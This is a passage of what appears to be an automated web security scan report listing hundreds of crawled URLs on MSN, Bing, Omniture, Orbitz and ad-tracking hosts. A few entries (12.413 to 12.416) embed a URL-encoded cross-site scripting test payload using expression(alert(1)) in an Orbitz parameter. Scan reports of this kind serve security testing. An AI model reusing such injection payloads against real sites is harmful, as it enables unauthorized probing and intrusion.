12.256. http://dlvr.it/Djx6x

12.257. http://dm.demdex.net/pixel/10236

12.258. http://dpm.demdex.net/demdot.jpg

12.259. http://ds.addthis.com/red/psi/p.json

12.260. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json

12.261. http://edge.quantserve.com/quant.js

12.262. http://editorial.autos.msn.com/articles/default.aspx

12.263. http://editorial.autos.msn.com/blogs/autosblog.aspx

12.264. http://editorial.autos.msn.com/media/default.aspx

12.265. http://editorial.autos.msn.com/media/video/default.aspx

12.266. http://editorial.autos.msn.com/new-cars/default.aspx

12.267. http://editorial.autos.msn.com/used-cars/default.aspx

12.268. http://entertainment.msn.com/

12.269. http://entertainment.msn.com/news/

12.270. http://entertainment.msn.com/video/

12.271. http://google.com/safebrowsing/diagnostic

12.272. http://gorp.away.com/

12.273. http://goto.ext.google.com/og-dogfood-issue

12.274. http://goto.ext.google.com/og-exp

12.275. http://groups.google.com/groups

12.276. http://health.msn.com/

12.277. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx

12.278. http://hit.clickaider.com/clickaider.js

12.279. http://hit.clickaider.com/pv

12.280. http://i.simpli.fi/dpx.js

12.281. http://image2.pubmatic.com/AdServer/Pug

12.282. http://images.google.com/images

12.283. http://info.yahoo.com/w3c/p3p.xml

12.284. http://jdn.monster.com/render/adserverclick.aspx

12.285. http://js.revsci.net/gateway/gw.js

12.286. http://khm0.google.com/kh/v/x3d78/x26

12.287. http://khm1.google.com/kh/v/x3d78/x26

12.288. http://khmdb0.google.com/kh

12.289. http://khmdb1.google.com/kh

12.290. http://kona32.kontera.com/KonaGet.js

12.291. http://latino.msn.com/

12.292. http://lifestyle.msn.com/

12.293. http://lifestyle.msn.com/relationships/

12.294. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx

12.295. http://lifestyle.msn.com/relationships/your-money-today/article.aspx

12.296. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx

12.297. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx

12.298. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx

12.299. http://lifestyle.msn.com/your-look/

12.300. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx

12.301. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx

12.302. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx

12.303. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx

12.304. http://local.msn.com/

12.305. http://local.msn.com/hourly.aspx

12.306. http://local.msn.com/movies-events.aspx

12.307. http://local.msn.com/news.aspx

12.308. http://local.msn.com/restaurants.aspx

12.309. http://local.msn.com/sports.aspx

12.310. http://local.msn.com/ten-day.aspx

12.311. http://local.msn.com/weather.aspx

12.312. https://login.facebook.com/help/

12.313. https://login.facebook.com/login.php

12.314. http://login.live.com/login.srf

12.315. https://login.live.com/login.srf

12.316. https://maps-api-ssl.google.com/maps

12.317. http://media.fastclick.net/w/tre

12.318. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

12.319. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

12.320. http://movies.msn.com/

12.321. http://movies.msn.com/movies/article.aspx

12.322. http://movies.msn.com/new-on-dvd/movies/

12.323. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

12.324. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

12.325. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/

12.326. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

12.327. http://movies.msn.com/showtimes/showtimes.aspx

12.328. http://movies.msn.com/the-rundown/the-guard/story_5/

12.329. http://mt2.google.com/mapstt

12.330. http://mt3.google.com/mapstt

12.331. http://music.msn.com/

12.332. http://music.msn.com/music/article.aspx

12.333. http://my.msn.com/

12.334. http://my.omniture.com/

12.335. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3

12.336. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

12.337. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

12.338. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

12.339. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

12.340. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017

12.341. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058

12.342. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902

12.343. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0

12.344. http://omtrdc.net/

12.345. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

12.346. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

12.347. http://orbitz.com/

12.348. http://ow.ly/1aWWoA

12.349. http://pingomatic.com/ping/

12.350. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.351. http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js

12.352. http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js

12.353. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

12.354. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

12.355. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

12.356. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

12.357. http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js

12.358. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

12.359. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

12.360. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

12.361. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

12.362. http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js

12.363. http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js

12.364. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

12.365. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

12.366. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

12.367. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

12.368. http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js

12.369. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

12.370. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

12.371. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

12.372. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

12.373. http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js

12.374. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

12.375. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

12.376. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

12.377. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

12.378. http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js

12.379. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

12.380. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

12.381. http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js

12.382. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

12.383. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

12.384. http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js

12.385. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

12.386. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

12.387. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

12.388. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

12.389. http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js

12.390. http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js

12.391. http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js

12.392. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

12.393. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

12.394. http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js

12.395. http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js

12.396. http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js

12.397. http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js

12.398. http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js

12.399. http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js

12.400. http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js

12.401. http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js

12.402. http://pixel.invitemedia.com/data_sync

12.403. http://pixel.mathtag.com/event/js

12.404. http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif

12.405. http://price.orbitz.com/

12.406. http://px.admonkey.dapper.net/PixelMonkey

12.407. http://r.casalemedia.com/j.gif

12.408. http://r.openx.net/set

12.409. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/

12.410. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/

12.411. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc

12.412. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588

12.413. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.414. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.415. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.416. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.417. http://realestate.msn.com/

12.418. http://realestate.msn.com/slideshow.aspx

12.419. http://sales.liveperson.net/hc/15744040/

12.420. http://sales.liveperson.net/hc/15744040/

12.421. http://scholar.google.com/scholar

12.422. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

12.423. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

12.424. http://segment-pixel.invitemedia.com/set_partner_uid

12.425. http://segment-pixel.invitemedia.com/setuid

12.426. http://showads.pubmatic.com/AdServer/AdServerServlet

12.427. http://showads.pubmatic.com/AdServer/AdServerServlet

12.428. http://showads.pubmatic.com/AdServer/AdServerServlet

12.429. http://showads.pubmatic.com/AdServer/AdServerServlet

12.430. http://showads.pubmatic.com/AdServer/AdServerServlet

12.431. http://showads.pubmatic.com/AdServer/AdServerServlet

12.432. http://showads.pubmatic.com/AdServer/AdServerServlet

12.433. http://showads.pubmatic.com/AdServer/AdServerServlet

12.434. http://sitelife.ehow.com/ver1.0/Direct/Process

12.435. https://sitesearch.omniture.com/center/

12.436. http://social.entertainment.msn.com/bloglist.aspx

12.437. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx

12.438. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx

12.439. http://sorry.google.com/sorry/

12.440. http://sorry.google.com/sorry/Captcha

12.441. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx

12.442. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

12.443. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx

12.444. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

12.445. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

12.446. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

12.447. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx

12.448. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

12.449. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx

12.450. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx

12.451. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

12.452. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

12.453. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

12.454. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

12.455. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

12.456. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

12.457. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

12.458. http://specials.msn.com/IEIncreaseFont_preview.aspx

12.459. http://specials.msn.com/alphabet.aspx

12.460. http://sync.mathtag.com/sync/img

12.461. http://t.invitemedia.com/track_imp

12.462. http://tags.bluekai.com/site/1463

12.463. http://tags.bluekai.com/site/2748

12.464. http://track.roiservice.com/track/LogToDb.asp.aspx

12.465. http://track.roiservice.com/track/track.aspx

12.466. http://tracking.tree.com/trk/npv-event.gif

12.467. http://tracking.tree.com/trk/pv.gif

12.468. http://translate.google.com/translate_t

12.469. http://tv.msn.com/

12.470. http://tv.msn.com/last-night-on-tv/

12.471. http://tv.msn.com/tv/article.aspx

12.472. http://video.google.com/videosearch

12.473. http://vs.dmtracker.com/tags/vs.js

12.474. http://w.ic.tynt.com/b/o

12.475. http://wp-superslider.com/

12.476. http://wp-superslider.com/index.php

12.477. http://www.addthis.com/bookmark.php

12.478. http://www.astaro.org/

12.479. http://www.away.com/

12.480. http://www.bing.com/

12.481. http://www.bing.com/images/results.aspx

12.482. http://www.bing.com/local/ypdefault.aspx

12.483. http://www.bing.com/maps/

12.484. http://www.bing.com/maps/default.aspx

12.485. http://www.bing.com/maps/explore/

12.486. http://www.bing.com/news/results.aspx

12.487. http://www.bing.com/news/search

12.488. http://www.bing.com/news/search

12.489. http://www.bing.com/results.aspx

12.490. http://www.bing.com/search

12.491. http://www.bing.com/shopping

12.492. http://www.bing.com/shopping/pet-beds/c/5533

12.493. http://www.bing.com/shopping/photo-storage-presentation/search

12.494. http://www.bing.com/shopping/search

12.495. http://www.bing.com/shopping/televisions/c/4724

12.496. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

12.497. http://www.bing.com/shopping/womens-workout-clothing/r/146

12.498. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do

12.499. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

12.500. http://www.bing.com/travel/hotels

12.501. http://www.bing.com/videos/browse

12.502. http://www.bing.com/videos/results.aspx

12.503. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j

12.504. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

12.505. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7

12.506. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

12.507. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

12.508. http://www.capitalone.com/creditcards/orbitz/index.php

12.509. http://www.cheaptickets.com/

12.510. http://www.demandstudios.com/ehow-writers.html

12.511. http://www.digitalia.be/

12.512. http://www.ehow.com/

12.513. http://www.evow.com/

12.514. http://www.facebook.com/

12.515. http://www.facebook.com/btaylor

12.516. http://www.facebook.com/careers/

12.517. http://www.facebook.com/directory/pages/

12.518. http://www.facebook.com/directory/people/

12.519. http://www.facebook.com/help/

12.520. http://www.facebook.com/ligatt

12.521. http://www.facebook.com/privacy/explanation.php

12.522. https://www.facebook.com/login.php

12.523. http://www.google.com/finance

12.524. http://www.google.com/setprefs

12.525. https://www.google.com/accounts/Login

12.526. http://www.lodging.com/

12.527. http://www.msn.com/

12.528. http://www.omniture.com/

12.529. http://www.omniture.com/de

12.530. http://www.omniture.com/en

12.531. http://www.omniture.com/en/

12.532. http://www.omniture.com/en/community

12.533. http://www.omniture.com/en/community/blogs

12.534. http://www.omniture.com/en/community/events

12.535. http://www.omniture.com/en/community/usergroups

12.536. http://www.omniture.com/en/company/adobe_faq

12.537. http://www.omniture.com/en/company/analyst_insight

12.538. http://www.omniture.com/en/company/customers

12.539. http://www.omniture.com/en/company/press_room

12.540. http://www.omniture.com/en/company/press_room/awards

12.541. http://www.omniture.com/en/company/press_room/news

12.542. http://www.omniture.com/en/company/press_room/press_releases

12.543. http://www.omniture.com/en/contact

12.544. http://www.omniture.com/en/contact/company

12.545. http://www.omniture.com/en/contact/email

12.546. http://www.omniture.com/en/contact/feedback

12.547. http://www.omniture.com/en/contact/offices

12.548. http://www.omniture.com/en/contact/sales

12.549. http://www.omniture.com/en/contact/support

12.550. http://www.omniture.com/en/education

12.551. http://www.omniture.com/en/education/academic_initiative

12.552. http://www.omniture.com/en/education/certification

12.553. http://www.omniture.com/en/education/certification/implementation

12.554. http://www.omniture.com/en/education/certification/insight_analyst

12.555. http://www.omniture.com/en/education/certification/insight_architect

12.556. http://www.omniture.com/en/education/certification/search_center

12.557. http://www.omniture.com/en/education/certification/site_catalyst

12.558. http://www.omniture.com/en/education/certification/support

12.559. http://www.omniture.com/en/education/certification/test_target

12.560. http://www.omniture.com/en/education/courses

12.561. http://www.omniture.com/en/education/courses/discover

12.562. http://www.omniture.com/en/education/courses/dop_analyst

12.563. http://www.omniture.com/en/education/courses/merchandising

12.564. http://www.omniture.com/en/education/courses/online_marketing_suite

12.565. http://www.omniture.com/en/education/courses/sbu

12.566. http://www.omniture.com/en/education/courses/searchcenter

12.567. http://www.omniture.com/en/education/courses/sitesearch

12.568. http://www.omniture.com/en/education/courses/survey

12.569. http://www.omniture.com/en/education/courses/testandtarget

12.570. http://www.omniture.com/en/partners

12.571. http://www.omniture.com/en/partners/apply

12.572. http://www.omniture.com/en/partners/portal

12.573. http://www.omniture.com/en/partners/showcase

12.574. http://www.omniture.com/en/privacy

12.575. http://www.omniture.com/en/privacy/2o7

12.576. http://www.omniture.com/en/privacy/policy

12.577. http://www.omniture.com/en/privacy/product

12.578. http://www.omniture.com/en/privacy/visualsciences

12.579. http://www.omniture.com/en/privacy/visualsciences/policy

12.580. http://www.omniture.com/en/privacy/visualsciences/resources

12.581. http://www.omniture.com/en/privacy/visualsciences/terms

12.582. http://www.omniture.com/en/product_tours/form

12.583. http://www.omniture.com/en/products/conversion

12.584. http://www.omniture.com/en/products/conversion/merchandising

12.585. http://www.omniture.com/en/products/conversion/publish

12.586. http://www.omniture.com/en/products/conversion/recommendations

12.587. http://www.omniture.com/en/products/conversion/searchandpromote

12.588. http://www.omniture.com/en/products/conversion/survey

12.589. http://www.omniture.com/en/products/conversion/testandtarget

12.590. http://www.omniture.com/en/products/conversion/testandtarget11

12.591. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

12.592. http://www.omniture.com/en/products/marketing_integration/genesis

12.593. http://www.omniture.com/en/products/marketing_integration/genesis/applications

12.594. http://www.omniture.com/en/products/multichannel_analytics

12.595. http://www.omniture.com/en/products/multichannel_analytics/insight

12.596. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

12.597. http://www.omniture.com/en/products/online_analytics

12.598. http://www.omniture.com/en/products/online_analytics/digitalpulse

12.599. http://www.omniture.com/en/products/online_analytics/discover

12.600. http://www.omniture.com/en/products/online_analytics/sitecatalyst

12.601. http://www.omniture.com/en/products/online_business_optimization

12.602. http://www.omniture.com/en/products/online_marketing_suite

12.603. http://www.omniture.com/en/products/open_business_analytics_platform

12.604. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

12.605. http://www.omniture.com/en/products/tours

12.606. http://www.omniture.com/en/products/visitor_acquisition

12.607. http://www.omniture.com/en/products/visitor_acquisition/searchcenter

12.608. http://www.omniture.com/en/resources

12.609. http://www.omniture.com/en/resources/articles

12.610. http://www.omniture.com/en/resources/case_studies

12.611. http://www.omniture.com/en/resources/cmo.com

12.612. http://www.omniture.com/en/resources/guides

12.613. http://www.omniture.com/en/resources/testimonials

12.614. http://www.omniture.com/en/resources/webinars

12.615. http://www.omniture.com/en/services

12.616. http://www.omniture.com/en/services/consulting

12.617. http://www.omniture.com/en/services/es

12.618. http://www.omniture.com/en/survey/5084

12.619. http://www.omniture.com/en/surveys

12.620. http://www.omniture.com/es

12.621. http://www.omniture.com/fr

12.622. http://www.omniture.com/jp

12.623. http://www.omniture.com/ko

12.624. http://www.omniture.com/offer/100

12.625. http://www.omniture.com/offer/101

12.626. http://www.omniture.com/offer/102

12.627. http://www.omniture.com/offer/107

12.628. http://www.omniture.com/offer/108

12.629. http://www.omniture.com/offer/158

12.630. http://www.omniture.com/offer/162

12.631. http://www.omniture.com/offer/17

12.632. http://www.omniture.com/offer/170

12.633. http://www.omniture.com/offer/186

12.634. http://www.omniture.com/offer/187

12.635. http://www.omniture.com/offer/191

12.636. http://www.omniture.com/offer/285

12.637. http://www.omniture.com/offer/286

12.638. http://www.omniture.com/offer/291

12.639. http://www.omniture.com/offer/301

12.640. http://www.omniture.com/offer/303

12.641. http://www.omniture.com/offer/323

12.642. http://www.omniture.com/offer/331

12.643. http://www.omniture.com/offer/335

12.644. http://www.omniture.com/offer/337

12.645. http://www.omniture.com/offer/357

12.646. http://www.omniture.com/offer/372

12.647. http://www.omniture.com/offer/400

12.648. http://www.omniture.com/offer/411

12.649. http://www.omniture.com/offer/412

12.650. http://www.omniture.com/offer/413

12.651. http://www.omniture.com/offer/427

12.652. http://www.omniture.com/offer/429

12.653. http://www.omniture.com/offer/435

12.654. http://www.omniture.com/offer/462

12.655. http://www.omniture.com/offer/704

12.656. http://www.omniture.com/offer/892

12.657. http://www.omniture.com/offer/987

12.658. http://www.omniture.com/offer/989

12.659. http://www.omniture.com/press/867

12.660. http://www.omniture.com/press/868

12.661. http://www.omniture.com/privacy/2o7

12.662. http://www.omniture.com/zh

12.663. http://www.orbitz.com/

12.664. http://www.orbitz.com/App/DPTLandingPageSearch

12.665. http://www.orbitz.com/App/DisplayCarSearch

12.666. http://www.orbitz.com/App/GDDC

12.667. http://www.orbitz.com/App/Home

12.668. http://www.orbitz.com/App/InitDealEdit

12.669. http://www.orbitz.com/App/PartnerTracking

12.670. http://www.orbitz.com/App/PerformMDLPDealsContent

12.671. http://www.orbitz.com/App/PrepareActivitiesHome

12.672. http://www.orbitz.com/App/PrepareDealsHome

12.673. http://www.orbitz.com/App/PrepareFlightsTab

12.674. http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp

12.675. http://www.orbitz.com/App/PrepareSearchResult

12.676. http://www.orbitz.com/App/PrepareVacationsHome

12.677. http://www.orbitz.com/App/Sitemap

12.678. http://www.orbitz.com/App/SubmitQuickSearch

12.679. http://www.orbitz.com/App/ViewDHTMLCalendar

12.680. http://www.orbitz.com/App/ViewHotelSearch

12.681. http://www.orbitz.com/App/ViewMyAccount

12.682. http://www.orbitz.com/App/ViewRSSHelpPage

12.683. http://www.orbitz.com/App/ViewRoundTripSearch

12.684. http://www.orbitz.com/App/ViewTravelWatchHome

12.685. http://www.orbitz.com/Secure/DelayedRegistration

12.686. http://www.orbitz.com/Secure/DelayedSignIn

12.687. http://www.orbitz.com/Secure/PerformDisplayMyTrips

12.688. http://www.orbitz.com/Secure/PrepareMemberPreferences

12.689. http://www.orbitz.com/Secure/SignOut

12.690. http://www.orbitz.com/Secure/ViewNewMemberReg

12.691. http://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

12.692. http://www.orbitz.com/cacheable/ad.html

12.693. http://www.orbitz.com/cacheable/ad_empty.html

12.694. http://www.orbitz.com/cacheable/empty.html

12.695. http://www.orbitz.com/content/www/orb/rss/flightdeals.rss.xml

12.696. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp

12.697. http://www.orbitz.com/public/ANS/Orbitz/html/PackageSave30_012411.xml

12.698. http://www.orbitz.com/shared/adserverProxy.jsp

12.699. http://www.orbitz.com/shared/css/DPTLiteDetails.css.jsp

12.700. http://www.orbitz.com/shared/css/calendar.css.jsp

12.701. http://www.orbitz.com/shared/css/dealsOrbot.css.jsp

12.702. http://www.orbitz.com/shared/css/dialog.css.jsp

12.703. http://www.orbitz.com/shared/css/global.css.jsp

12.704. http://www.orbitz.com/shared/css/homepage.css.jsp

12.705. http://www.orbitz.com/shared/js/behaviors.js

12.706. http://www.orbitz.com/shared/js/bot.js

12.707. http://www.orbitz.com/shared/js/cookie.js

12.708. http://www.orbitz.com/shared/js/deals.js

12.709. http://www.orbitz.com/shared/js/destinationDetails.js

12.710. http://www.orbitz.com/shared/js/global.js

12.711. http://www.orbitz.com/shared/js/lib/dialog.js

12.712. http://www.orbitz.com/shared/js/lib/prototype.js

12.713. http://www.orbitz.com/shared/js/lib/prototypeExtensions.js

12.714. http://www.orbitz.com/shared/js/lib/scriptaculous/src/builder.js

12.715. http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js

12.716. http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js

12.717. http://www.orbitz.com/shared/js/lib/scriptaculous/src/effects.js

12.718. http://www.orbitz.com/shared/js/lib/scriptaculous/src/scriptaculous.js

12.719. http://www.orbitz.com/shared/js/lib/scriptaculous/src/slider.js

12.720. http://www.orbitz.com/shared/js/lib/scriptaculous/src/sound.js

12.721. http://www.orbitz.com/shared/js/tracking/webtrends.js

12.722. http://www.orbitz.com/shared/js/vendor/tealeaf.js

12.723. http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp

12.724. http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp

12.725. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp

12.726. http://www.orbitz.com/shop/hotelsearch

12.727. http://www.orbitz.com/site/js/jsAllTeaLeaf.js

12.728. http://www.orbitz.com/tealeaf.jsp

12.729. http://www.orbitz.com/tealeaf.jsp

12.730. https://www.orbitz.com/App/PartnerTracking

12.731. https://www.orbitz.com/App/ViewMyAccount

12.732. https://www.orbitz.com/Secure/SignIn

12.733. https://www.orbitz.com/Secure/ViewSecureCalendar

12.734. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

12.735. http://www.orbitzforagents.com/

12.736. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting

12.737. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

12.738. http://www.parentsconnect.com/eat/index.jhtml

12.739. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&

